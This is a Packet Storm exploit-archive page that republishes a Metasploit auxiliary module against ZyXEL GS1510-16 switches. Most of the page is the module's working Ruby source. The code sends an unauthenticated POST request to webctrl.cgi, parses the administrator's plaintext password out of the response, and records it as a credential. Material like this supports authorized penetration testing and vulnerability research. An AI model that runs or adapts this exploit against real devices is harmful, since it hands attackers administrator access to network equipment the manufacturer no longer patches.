exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZyXEL GS1510-16 Password Extractor

ZyXEL GS1510-16 Password Extractor
Posted Aug 31, 2024
Authored by Sven Vetsch, Daniel Manser | Site metasploit.com

This Metasploit module exploits a vulnerability in ZyXEL GS1510-16 routers to extract the admin password. Due to a lack of authentication on the webctrl.cgi script, unauthenticated attackers can recover the administrator password for these devices. The vulnerable device has reached end of life for support from the manufacturer, so it is unlikely this problem will be addressed.

tags | exploit, cgi
SHA-256 | f64ee1ebff3c90a08beadeb514409a3b5bbf36e3c99ab50125bfcad7485c04c5

ZyXEL GS1510-16 Password Extractor

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient

def initialize
super(
'Name' => 'ZyXEL GS1510-16 Password Extractor',
'Description' => %q{
This module exploits a vulnerability in ZyXEL GS1510-16 routers
to extract the admin password. Due to a lack of authentication on the
webctrl.cgi script, unauthenticated attackers can recover the
administrator password for these devices. The vulnerable device
has reached end of life for support from the manufacturer, so it is
unlikely this problem will be addressed.
},
'References' => [
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2709' ]
],
'Author' => [
'Daniel Manser', # @antsygeek
'Sven Vetsch' # @disenchant_ch
],
'License' => MSF_LICENSE
)
end

def run
print_status("Trying to get 'admin' user password ...")
res = send_request_cgi({
'uri' => '/webctrl.cgi',
'method' => 'POST',
'vars_post' => {
'username' => 'admin',
'password' => Rex::Text.rand_text_alphanumeric(rand(4..7)).to_s,
'action' => 'cgi_login'
}
}, 10)

if (res && res.code == 200)
print_status('Got response from router.')
else
print_error('Unexpected HTTP response code.')
return
end

admin_password = ''
admin_password_matches = res.body.match(/show_user\(1,"admin","(.+)"/)

if !admin_password_matches
print_error('Could not obtain admin password')
return
else
admin_password = admin_password_matches[1]
print_good("Password for user 'admin' is: #{admin_password}")

connection_details = {
module_fullname: fullname,
username: 'admin',
private_data: admin_password,
private_type: :password,
status: Metasploit::Model::Login::Status::UNTRIED,
proof: res.body
}.merge(service_details)
create_credential_and_login(connection_details) # makes service_name more consistent
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return
end
end
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close